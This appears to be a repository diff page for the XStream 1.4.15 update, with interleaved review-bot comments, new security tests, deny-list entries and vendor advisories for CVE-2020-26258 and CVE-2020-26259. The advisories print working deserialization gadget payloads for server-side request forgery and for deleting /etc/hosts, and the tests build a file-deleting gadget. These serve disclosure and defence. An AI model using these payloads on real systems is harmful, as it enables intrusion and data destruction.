Codebase list libxstream-java / 0337d7d
Update upstream source from tag 'upstream/1.4.15' Update to upstream version '1.4.15' with Debian dir 69c069b67ff8bb728fa80d7b38983f2e50a40ea5 Markus Koschany 3 years ago
22 changed file(s) with 502 addition(s) and 71 deletion(s). Raw diff Collapse all Expand all
1010 Before deploying:
1111
1212 copy settings-template.xml to ~/.m2/settings.xml adding your Sonatype OSSRH
13 username and passwords.
13 username and passwords and also your GPG key and password.
1414
1515 To deploy (optionally adding sources and javadoc jars):
1616 mvn deploy
1313 <groupId>com.thoughtworks.xstream</groupId>
1414 <artifactId>xstream-parent</artifactId>
1515 <packaging>pom</packaging>
16 <version>1.4.14</version>
16 <version>1.4.15</version>
1717 <name>XStream Parent</name>
1818 <url>http://x-stream.github.io</url>
1919 <description>
409409 <dependency>
410410 <groupId>com.thoughtworks.xstream</groupId>
411411 <artifactId>xstream</artifactId>
412 <version>1.4.14</version>
412 <version>1.4.15</version>
413413 </dependency>
414414 <dependency>
415415 <groupId>com.thoughtworks.xstream</groupId>
416416 <artifactId>xstream</artifactId>
417 <version>1.4.14</version>
417 <version>1.4.15</version>
418418 <classifier>tests</classifier>
419419 <type>test-jar</type>
420420 <scope>test</scope>
422422 <dependency>
423423 <groupId>com.thoughtworks.xstream</groupId>
424424 <artifactId>xstream</artifactId>
425 <version>1.4.14</version>
425 <version>1.4.15</version>
426426 <classifier>javadoc</classifier>
427427 <scope>provided</scope>
428428 </dependency>
429429 <dependency>
430430 <groupId>com.thoughtworks.xstream</groupId>
431431 <artifactId>xstream-hibernate</artifactId>
432 <version>1.4.14</version>
432 <version>1.4.15</version>
433433 </dependency>
434434 <dependency>
435435 <groupId>com.thoughtworks.xstream</groupId>
436436 <artifactId>xstream-hibernate</artifactId>
437 <version>1.4.14</version>
437 <version>1.4.15</version>
438438 <classifier>javadoc</classifier>
439439 <scope>provided</scope>
440440 </dependency>
441441 <dependency>
442442 <groupId>com.thoughtworks.xstream</groupId>
443443 <artifactId>xstream-jmh</artifactId>
444 <version>1.4.14</version>
444 <version>1.4.15</version>
445445 </dependency>
446446 <dependency>
447447 <groupId>com.thoughtworks.xstream</groupId>
448448 <artifactId>xstream-jmh</artifactId>
449 <version>1.4.14</version>
449 <version>1.4.15</version>
450450 <classifier>javadoc</classifier>
451451 <scope>provided</scope>
452452 </dependency>
453453 <dependency>
454454 <groupId>com.thoughtworks.xstream</groupId>
455455 <artifactId>xstream-benchmark</artifactId>
456 <version>1.4.14</version>
456 <version>1.4.15</version>
457457 </dependency>
458458 <dependency>
459459 <groupId>com.thoughtworks.xstream</groupId>
460460 <artifactId>xstream-benchmark</artifactId>
461 <version>1.4.14</version>
461 <version>1.4.15</version>
462462 <classifier>javadoc</classifier>
463463 <scope>provided</scope>
464464 </dependency>
633633 <groupId>javax.xml.bind</groupId>
634634 <artifactId>jaxb-api</artifactId>
635635 <version>${version.javax.xml.bind.api}</version>
636 </dependency>
637 <dependency>
638 <groupId>com.sun.xml.ws</groupId>
639 <artifactId>jaxws-rt</artifactId>
640 <version>${version.javax.xml.ws.jaxws.rt}</version>
636641 </dependency>
637642
638643 <dependency>
843848 <groupId>org.apache.maven.plugins</groupId>
844849 <artifactId>maven-gpg-plugin</artifactId>
845850 <version>${version.plugin.maven.gpg}</version>
851 <configuration>
852 <keyname>${gpg.keyname}</keyname>
853 <passphraseServerId>${gpg.keyname}</passphraseServerId>
854 </configuration>
846855 </plugin>
847856 <plugin>
848857 <groupId>org.apache.maven.plugins</groupId>
11131122 <version.plugin.maven.deploy>2.3</version.plugin.maven.deploy>
11141123 <version.plugin.maven.enforcer>1.4</version.plugin.maven.enforcer>
11151124 <version.plugin.maven.failsafe>2.22.0</version.plugin.maven.failsafe>
1116 <version.plugin.maven.gpg>1.4</version.plugin.maven.gpg>
1125 <version.plugin.maven.gpg>1.6</version.plugin.maven.gpg>
11171126 <version.plugin.maven.install>2.2</version.plugin.maven.install>
11181127 <version.plugin.maven.jar>2.2</version.plugin.maven.jar>
11191128 <version.plugin.maven.javadoc>2.10</version.plugin.maven.javadoc>
11411150 <version.javax.annotation.api>1.3.2</version.javax.annotation.api>
11421151 <version.javax.inject>2.4.0</version.javax.inject>
11431152 <version.javax.xml.bind.api>2.3.1</version.javax.xml.bind.api>
1153 <version.javax.xml.ws.jaxws.rt>2.2</version.javax.xml.ws.jaxws.rt><!-- Java 5 -->
11441154 <version.jmock>1.0.1</version.jmock>
11451155 <version.joda-time>1.6</version.joda-time>
11461156 <version.junit>3.8.1</version.junit>
11541164 <version.org.jdom2>2.0.5</version.org.jdom2>
11551165 <version.org.json>20080701</version.org.json>
11561166 <version.org.openjdk.jmh>1.21</version.org.openjdk.jmh>
1157 <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- java 6 -->
1167 <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- Java 6 -->
11581168 <version.org.slf4j>1.6.1</version.org.slf4j>
11591169 <version.stax>1.2.0</version.stax>
11601170 <version.stax.api>1.0.1</version.stax.api>
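Review bot: The new `<configuration>` of `maven-gpg-plugin` feeds `passphraseServerId` with the same `${gpg.keyname}` property that is used for `keyname`, which silently couples the settings.xml `<server>` id to the GPG key name; a comment would make that contract explicit: `<!-- passphrase is read from the settings.xml <server> whose <id> equals ${gpg.keyname}; passphraseServerId is, as far as I recall, available from maven-gpg-plugin 1.6 on -->`. That is also why the bump of `version.plugin.maven.gpg` from 1.4 to 1.6 in the later hunk belongs with this change and should not be reverted independently. The `<plugin>` element starts outside the hunk.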
1919 <id>ossrh-staging</id>
2020 <username>your-sonatype.org-id</username>
2121 <password>your-sonatype.org-pwd</password>
22 </server>
22 </server>
23 <server>
24 <id>${gpg.keyname}</id>
25 <password>your-gpg-key-pwd</password>
26 </server>
2327 </servers>
28 <properties>
29 <gpg.keyname>your-gpg-keyname</gpg.keyname>
30 </properties>
2431 </settings>
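Review bot: The `<properties>` block added directly under `<settings>` is, as far as I know, not part of the settings.xml schema (properties are only valid inside a `<profile>`), so Maven's strict settings reader will reject it and fall back to ignoring it with a warning, leaving `${gpg.keyname}` in the new `<server><id>` unresolved unless the value is supplied as `-Dgpg.keyname=...`; either move the property into an active profile and pass it on the command line, or state the `-D` requirement in the deploy notes changed at the top of this commit so the `<id>` and the parent pom's `passphraseServerId` cannot drift apart. The template also places the GPG passphrase in clear text next to the Sonatype password; a short comment pointing at Maven's password encryption (`mvn --encrypt-password` with a `settings-security.xml`) would steer users to the safer default, e.g. `<!-- may be an encrypted {…} value, see mvn --encrypt-password -->`.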
1313 <parent>
1414 <groupId>com.thoughtworks.xstream</groupId>
1515 <artifactId>xstream-parent</artifactId>
16 <version>1.4.14</version>
16 <version>1.4.15</version>
1717 </parent>
1818 <artifactId>xstream</artifactId>
1919 <packaging>jar</packaging>
141141 <groupId>commons-lang</groupId>
142142 <artifactId>commons-lang</artifactId>
143143 <scope>test</scope>
144 </dependency>
145
146 <dependency>
147 <groupId>com.sun.xml.ws</groupId>
148 <artifactId>jaxws-rt</artifactId>
149 <scope>test</scope>
150 <exclusions>
151 <exclusion>
152 <groupId>javax.xml.ws</groupId>
153 <artifactId>jaxws-api</artifactId>
154 </exclusion>
155 <exclusion>
156 <groupId>com.sun.istack</groupId>
157 <artifactId>istack-commons-runtime</artifactId>
158 </exclusion>
159 <exclusion>
160 <groupId>com.sun.xml.bind</groupId>
161 <artifactId>jaxb-impl</artifactId>
162 </exclusion>
163 <exclusion>
164 <groupId>com.sun.xml.messaging.saaj</groupId>
165 <artifactId>saaj-impl</artifactId>
166 </exclusion>
167 <exclusion>
168 <groupId>com.sun.xml.stream.buffer</groupId>
169 <artifactId>streambuffer</artifactId>
170 </exclusion>
171 <exclusion>
172 <groupId>com.sun.xml.ws</groupId>
173 <artifactId>policy</artifactId>
174 </exclusion>
175 <exclusion>
176 <groupId>com.sun.org.apache.xml.internal</groupId>
177 <artifactId>resolver</artifactId>
178 </exclusion>
179 <exclusion>
180 <groupId>org.glassfish.gmbal</groupId>
181 <artifactId>gmbal-api-only</artifactId>
182 </exclusion>
183 <exclusion>
184 <groupId>org.jvnet</groupId>
185 <artifactId>mimepull</artifactId>
186 </exclusion>
187 <exclusion>
188 <groupId>org.jvnet.staxex</groupId>
189 <artifactId>stax-ex</artifactId>
190 </exclusion>
191 </exclusions>
144192 </dependency>
145193 </dependencies>
146194
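Review bot: The new `jaxws-rt` test dependency carries ten exclusions without a word on why the artifact is needed or why its transitive closure is cut down, so the next maintainer is likely to "clean up" the exclusions; a comment above the `<dependency>` would prevent that: `<!-- only provides com.sun.xml.ws.util.ReadAllStream$FileStream for SecurityVulnerabilityTest (CVE-2020-26259); the rest of the JAX-WS runtime is not needed -->`. The same applies to the matching `dependencyManagement` entry in the parent pom, where the `<!-- Java 5 -->` comment on the version property explains the pin but not the purpose. The enclosing `<dependencies>` element starts outside the hunk.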
336336 private static final Pattern IGNORE_ALL = Pattern.compile(".*");
337337 private static final Pattern LAZY_ITERATORS = Pattern.compile(".*\\$LazyIterator");
338338 private static final Pattern JAVAX_CRYPTO = Pattern.compile("javax\\.crypto\\..*");
339 private static final Pattern JAXWS_FILE_STREAM = Pattern.compile(".*\\.ReadAllStream\\$FileStream");
339340
340341 /**
341342 * Constructs a default XStream.
641642 }
642643
643644 addPermission(AnyTypePermission.ANY);
644 denyTypes(new String[]{"java.beans.EventHandler", "java.lang.ProcessBuilder", "javax.imageio.ImageIO$ContainsFilter"});
645 denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO});
645 denyTypes(new String[]{
646 "java.beans.EventHandler", //
647 "java.lang.ProcessBuilder", //
648 "javax.imageio.ImageIO$ContainsFilter", //
649 "jdk.nashorn.internal.objects.NativeString" });
650 denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO, JAXWS_FILE_STREAM});
646651 allowTypeHierarchy(Exception.class);
647652 securityInitialized = false;
648653 }
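Review bot: The new `JAXWS_FILE_STREAM` pattern in the first hunk is the only deny entry expressed as a regular expression, and nothing says why a plain name like the other three additions would not do; the test in this commit uses `com.sun.xml.ws.util.ReadAllStream$FileStream` while the advisory page uses `com.sun.xml.internal.ws.util.ReadAllStream$FileStream`, so a comment on the constant would capture the reason: `// matches ReadAllStream$FileStream in both the com.sun.xml.ws and com.sun.xml.internal.ws packages (CVE-2020-26259)`. A similar one-liner on the `denyTypes` array naming CVE-2020-26258 for `jdk.nashorn.internal.objects.NativeString` would tie the default blacklist entries to the advisories they come from. The method containing the `denyTypes` call starts outside the second hunk.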
00 /*
11 * Copyright (C) 2006 Joe Walnes.
2 * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019 XStream Committers.
2 * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019, 2020 XStream Committers.
33 * All rights reserved.
44 *
55 * The software in this package is published under the terms of the BSD
278278 final BitSet XML_NAME_CHARS_4TH = new BitSet(0xFFFFF);
279279 XML_NAME_CHARS_4TH.set('-');
280280 XML_NAME_CHARS_4TH.set('.');
281 XML_NAME_CHARS_4TH.set('0', '9');
281 XML_NAME_CHARS_4TH.set('0', '9' + 1);
282282 XML_NAME_CHARS_4TH.set(0xB7);
283283
284284 final BitSet XML_NAME_CHARS_5TH = (BitSet)XML_NAME_CHARS_4TH.clone();
405405 XML_NAME_CHARS_4TH.set(0x30FC, 0x30FE + 1);
406406
407407 XML_NAME_CHARS_5TH.or(XML_NAME_START_CHARS_5TH);
408 XML_NAME_CHARS_5TH.set(0x300, 0x36F);
409 XML_NAME_CHARS_5TH.set(0x203F, 0x2040);
408 XML_NAME_CHARS_5TH.set(0x300, 0x36F + 1);
409 XML_NAME_CHARS_5TH.set(0x203F, 0x2040 + 1);
410410
411411 XML_NAME_START_CHARS = (BitSet)XML_NAME_START_CHARS_4TH.clone();
412412 XML_NAME_START_CHARS.and(XML_NAME_START_CHARS_5TH);
492492 // First, fast (common) case: nothing to escape
493493 int i = 0;
494494
495 for (; i < length; i++ ) {
496 char c = name.charAt(i);
497 if (c == '$' || c == '_' || c <= 27 || c >= 127) {
495 for (; i < length; i++) {
496 final char c = name.charAt(i);
497 if (c < 'A' || (c > 'Z' && c < 'a') || c > 'Z') {
498498 break;
499499 }
500500 }
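Review bot: The last clause of the new fast-path condition, `c > 'Z'`, looks like a typo for `c > 'z'`: as written it makes the middle clause `(c > 'Z' && c < 'a')` redundant and sends every lowercase letter to the slow path, so the "nothing to escape" shortcut is only taken for all-uppercase names. Presumably the intent is to accept ASCII letters only (digits now need escaping, cf. the `'9' + 1` BitSet fix in the first hunk), i.e. `if (c < 'A' || (c > 'Z' && c < 'a') || c > 'z') {`. The output stays correct either way since the slow path handles everything from index `i` on; only the common case is never hit. The enclosing method starts and ends outside the hunk.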
00 /*
11 * Copyright (C) 2005, 2006 Joe Walnes.
2 * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016 XStream Committers.
2 * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016, 2020 XStream Committers.
33 * All rights reserved.
44 *
55 * The software in this package is published under the terms of the BSD
7676 initialize = elementName.charAt(0) == '[';
7777 }
7878 return Class.forName(elementName, initialize, classLoader);
79 } catch (ClassNotFoundException e) {
79 } catch (final ClassNotFoundException e) {
80 throw new CannotResolveClassException(elementName);
81 } catch (final IllegalArgumentException e) {
8082 throw new CannotResolveClassException(elementName);
8183 }
8284 }
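Review bot: The second `catch` added after `Class.forName` has the same body as the first, and nothing records why an `IllegalArgumentException` is expected there; the changelog entry for GHPR:#228 only says it is thrown by `Class.forName()`. A comment on the new catch would save the next reader from removing it as dead code: `// Class.forName may throw IllegalArgumentException instead of ClassNotFoundException for some element names on some JVMs (GHPR #228) — treat it as unresolvable`. The enclosing method starts outside the hunk.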
1010 package com.thoughtworks.acceptance;
1111
1212 import java.beans.EventHandler;
13 import java.io.File;
14 import java.io.FileOutputStream;
15 import java.io.IOException;
16 import java.io.InputStream;
17 import java.io.OutputStream;
1318 import java.util.Iterator;
1419
1520 import com.thoughtworks.xstream.XStream;
212217 // OK
213218 }
214219 }
220
221 public void testCannotUseJaxwsInputStreamToDeleteFile() {
222 if (JVM.isVersion(5)) {
223 final String xml = ""
224 + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n"
225 + " <tempFile>target/junit/test.txt</tempFile>\n"
226 + "</is>";
227
228 xstream.aliasType("is", InputStream.class);
229 try {
230 xstream.fromXML(xml);
231 fail("Thrown " + ConversionException.class.getName() + " expected");
232 } catch (final ForbiddenClassException e) {
233 // OK
234 }
235 }
236 }
237
238 public void testExplicitlyUseJaxwsInputStreamToDeleteFile() throws IOException {
239 if (JVM.isVersion(5)) {
240 final File testDir = new File("target/junit");
241 final File testFile = new File(testDir, "test.txt");
242 try {
243 testDir.mkdirs();
244
245 final OutputStream out = new FileOutputStream(testFile);
246 out.write("JUnit".getBytes());
247 out.flush();
248 out.close();
249
250 assertTrue("Test file " + testFile.getPath() + " does not exist.", testFile.exists());
251
252 final String xml = ""
253 + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n"
254 + " <tempFile>target/junit/test.txt</tempFile>\n"
255 + "</is>";
256
257 xstream.addPermission(AnyTypePermission.ANY); // clear out defaults
258 xstream.aliasType("is", InputStream.class);
259
260 InputStream is = null;
261 try {
262 is = (InputStream)xstream.fromXML(xml);
263 } catch (final ForbiddenClassException e) {
264 // OK
265 }
266
267 assertTrue("Test file " + testFile.getPath() + " no longer exists.", testFile.exists());
268
269 byte[] data = new byte[10];
270 is.read(data);
271 is.close();
272
273 assertFalse("Test file " + testFile.getPath() + " still exists exist.", testFile.exists());
274 } finally {
275 if (testFile.exists()) {
276 testFile.delete();
277 }
278 if (testDir.exists()) {
279 testDir.delete();
280 }
281 }
282 }
283 }
215284 }
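Review bot: In `testExplicitlyUseJaxwsInputStreamToDeleteFile` the `catch (final ForbiddenClassException e)` around `fromXML` swallows the exception and leaves `is` null, so a denied type would surface as a NullPointerException at `is.read(data)` rather than as a test failure with a clear message; the test has just granted `AnyTypePermission.ANY`, so a ForbiddenClassException is unexpected here and the catch should fail explicitly, e.g. `} catch (final ForbiddenClassException e) { fail("Unexpected " + e); }`. The `FileOutputStream` at the top of the same method is not closed on an exception path before `out.close()`; a nested `try { … } finally { out.close(); }` would avoid leaking the handle inside the JUnit run. In `testCannotUseJaxwsInputStreamToDeleteFile` the `fail` message names `ConversionException` while the catch expects `ForbiddenClassException`; if that wording is shared with the other tests in the class it deserves a one-line comment, otherwise `ForbiddenClassException.class.getName()` keeps message and assertion consistent.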
186186 assertBothWays("\"", "<string>&quot;</string>");
187187 }
188188
189 public void testsDigitsOnly() {
190 xstream.alias("0123456789", String.class);
191 assertBothWays("", "<_.0030123456789></_.0030123456789>");
192 }
193
189194 public void testDecimalFormatSymbols() {
190195 final String xml;
191196 if (!JVM.is14()) {
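Review bot: The new test method is named `testsDigitsOnly`; JUnit 3 still runs it because the name starts with `test`, but the extra `s` breaks the naming pattern of the neighbouring `testDecimalFormatSymbols`: `public void testDigitsOnly() {`. The expected value `<_.0030123456789>` is also not self-explanatory; a short comment would help: `// a leading digit is not a valid XML name start, so '0' is hex-escaped as _.0030`.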
1313 <parent>
1414 <groupId>com.thoughtworks.xstream</groupId>
1515 <artifactId>xstream-parent</artifactId>
16 <version>1.4.14</version>
16 <version>1.4.15</version>
1717 </parent>
1818 <artifactId>xstream-benchmark</artifactId>
1919 <packaging>jar</packaging>
1313 <parent>
1414 <groupId>com.thoughtworks.xstream</groupId>
1515 <artifactId>xstream-parent</artifactId>
16 <version>1.4.14</version>
16 <version>1.4.15</version>
1717 </parent>
1818 <artifactId>xstream-distribution</artifactId>
1919 <packaging>pom</packaging>
2121
2222 <p>All versions until and including version 1.4.13 are affected, if using the version out of the box. No user is
2323 affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
24 framework</a> with a white list.</p>
24 framework</a> with a whitelist.</p>
2525
2626 <h2 id="description">Description</h2>
2727
108108 input stream.</p>
109109
110110 <h2 id="workaround">Workaround</h2>
111 <p>As recommended, use XStream's security framework to implement a white list for the allowed types.</p>
112 <p>Users of XStream 1.4.13 who want to use XStream default black list can simply add two lines to XStream's setup code:</p>
111 <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
112 <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add two lines to XStream's setup code:</p>
113113 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
114114 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
115115 </pre></div>
116 <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from
116 <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
117117 scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
118118 <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>java.lang.Void</em> and <em>void</em>.</p>
119119 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
138138
139139 <h2 id="credits">Credits</h2>
140140
141 <p>Chen L reported the issue to XStream and provided the required information to reproduce it. The issue was found
142 by Zhihong Tian and Hui Lu, both from Guangzhou University.</p>
141 <p>Chen L found and reported the issue to XStream and provided the required information to reproduce it. He was
142 supported by Zhihong Tian and Hui Lu, both from Guangzhou University.</p>
143143
144144 </body>
145145 </html>
0 <html>
1 <!--
2 Copyright (C) 2020 XStream committers.
3 All rights reserved.
4
5 The software in this package is published under the terms of the BSD
6 style license a copy of which has been included with this distribution in
7 the LICENSE.txt file.
8
9 Created on 24. November 2020 by Joerg Schaible
10 -->
11 <head>
12 <title>CVE-2020-26258</title>
13 </head>
14 <body>
15
16 <h2 id="vulnerability">Vulnerability</h2>
17
18 <p>CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
19 from an arbitrary URL referencing a resource in an intranet or the local host.</p>
20
21 <h2 id="affected_versions">Affected Versions</h2>
22
23 <p>All versions until and including version 1.4.14 are affected running in a Java environment below Java 15, if
24 using the version out of the box. No user is affected, who followed the recommendation to setup
25 <a href="security.html#framework">XStream's security framework</a> with a whitelist.</p>
26
27 <h2 id="description">Description</h2>
28
29 <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
30 XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
31 input stream and replace or inject objects, that result in a server-side forgery request.</p>
32
33 <h2 id="reproduction">Steps to Reproduce</h2>
34
35 <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and
36 unmarshal it again with XStream:</p>
37 <div class="Source XML"><pre>&lt;map&gt;
38 &lt;entry&gt;
39 &lt;jdk.nashorn.internal.objects.NativeString&gt;
40 &lt;flags&gt;0&lt;/flags&gt;
41 &lt;value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'&gt;
42 &lt;dataHandler&gt;
43 &lt;dataSource class='javax.activation.URLDataSource'&gt;
44 &lt;url&gt;http://localhost:8080/internal/:&lt;/url&gt;
45 &lt;/dataSource&gt;
46 &lt;transferFlavors/&gt;
47 &lt;/dataHandler&gt;
48 &lt;dataLen&gt;0&lt;/dataLen&gt;
49 &lt;/value&gt;
50 &lt;/jdk.nashorn.internal.objects.NativeString&gt;
51 &lt;string&gt;test&lt;/string&gt;
52 &lt;/entry&gt;
53 &lt;/map&gt;
54 </pre></div>
55 <div class="Source Java"><pre>XStream xstream = new XStream();
56 xstream.fromXML(xml);
57 </pre></div>
58
59 <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
60
61 <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p>
62
63 <h2 id="impact">Impact</h2>
64
65 <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
66 available only by manipulating the processed input stream.</p>
67
68 <h2 id="workaround">Workaround</h2>
69 <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
70 <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
71 simply add two lines to XStream's setup code:</p>
72 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
73 xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
74 </pre></div>
75 <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup
76 code:</p>
77 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
78 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
79 xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
80 </pre></div>
81 <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
82 scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
83 <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>,
84 <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p>
85 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
86 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
87 xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
88 </pre></div>
89 <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently
90 know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p>
91 <div class="Source Java"><pre>xstream.registerConverter(new Converter() {
92 public boolean canConvert(Class type) {
93 return type != null &amp;&amp; (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
94 || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
95 || type == java.lang.Void.class || void.class || Proxy.isProxy(type)
96 || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
97 }
98
99 public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
100 throw new ConversionException("Unsupported type due to security reasons.");
101 }
102
103 public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
104 throw new ConversionException("Unsupported type due to security reasons.");
105 }
106 }, XStream.PRIORITY_LOW);
107 </pre></div>
108
109 <h2 id="credits">Credits</h2>
110
111 <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
112
113 </body>
114 </html>
0 <html>
1 <!--
2 Copyright (C) 2020 XStream committers.
3 All rights reserved.
4
5 The software in this package is published under the terms of the BSD
6 style license a copy of which has been included with this distribution in
7 the LICENSE.txt file.
8
9 Created on 06. December 2020 by Joerg Schaible
10 -->
11 <head>
12 <title>CVE-2020-26259</title>
13 </head>
14 <body>
15
16 <h2 id="vulnerability">Vulnerability</h2>
17
18 <p>CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long
19 as the executing process has sufficient rights.</p>
20
21 <h2 id="affected_versions">Affected Versions</h2>
22
23 <p>All versions until and including version 1.4.14 are affected running in a Java environment containing the JAX-WS
24 runtime, if using the version out of the box. No user is affected, who followed the recommendation to setup
25 <a href="security.html#framework">XStream's security framework</a> with a whitelist.</p>
26
27 <h2 id="description">Description</h2>
28
29 <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
30 XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
31 input stream and replace or inject objects, that result in a server-side forgery request.</p>
32
33 <h2 id="reproduction">Steps to Reproduce</h2>
34
35 <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and
36 unmarshal it again with XStream:</p>
37 <div class="Source XML"><pre>&lt;map&gt;
38 &lt;entry&gt;
39 &lt;jdk.nashorn.internal.objects.NativeString&gt;
40 &lt;flags&gt;0&lt;/flags&gt;
41 &lt;value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'&gt;
42 &lt;dataHandler&gt;
43 &lt;dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'&gt;
44 &lt;contentType&gt;text/plain&lt;/contentType&gt;
45 &lt;is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'&gt;
46 &lt;tempFile&gt;/etc/hosts&lt;/tempFile&gt;
47 &lt;/is&gt;
48 &lt;/dataSource&gt;
49 &lt;transferFlavors/&gt;
50 &lt;/dataHandler&gt;
51 &lt;dataLen&gt;0&lt;/dataLen&gt;
52 &lt;/value&gt;
53 &lt;/jdk.nashorn.internal.objects.NativeString&gt;
54 &lt;string&gt;test&lt;/string&gt;
55 &lt;/entry&gt;
56 &lt;/map&gt;
57 </pre></div>
58 <div class="Source Java"><pre>XStream xstream = new XStream();
59 xstream.fromXML(xml);
60 </pre></div>
61
62 <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p>
63
64 <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p>
65
66 <h2 id="impact">Impact</h2>
67
68 <p>The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing
69 process has sufficient rights only by manipulating the processed input stream.</p>
70
71 <h2 id="workaround">Workaround</h2>
72 <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p>
73 <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can
74 simply add two lines to XStream's setup code:</p>
75 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
76 xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
77 </pre></div>
78 <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup
79 code:</p>
80 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
81 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
82 xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
83 </pre></div>
84 <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from
85 scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>,
86 <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>,
87 <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p>
88 <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
89 xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
90 xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
91 </pre></div>
92 <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently
93 know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p>
94 <div class="Source Java"><pre>xstream.registerConverter(new Converter() {
95 public boolean canConvert(Class type) {
96 return type != null &amp;&amp; (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
